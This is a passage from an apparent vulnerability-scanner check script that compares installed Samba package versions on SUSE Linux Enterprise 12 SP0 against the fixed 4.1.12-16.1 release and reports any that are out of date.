isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", rpm:\"libsamba-credentials0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0\", rpm:\"libsamba-hostconfig0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"SLES12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0\", rpm:\"libndr-krb5pac0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0\", rpm:\"libpdb0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo\", rpm:\"libpdb0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0\", rpm:\"libsamba-hostconfig0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", rpm:\"libdcerpc0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", rpm:\"libndr-krb5pac0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-32bit\", rpm:\"libpdb0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo-32bit\", rpm:\"libpdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", rpm:\"libsamba-credentials0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n 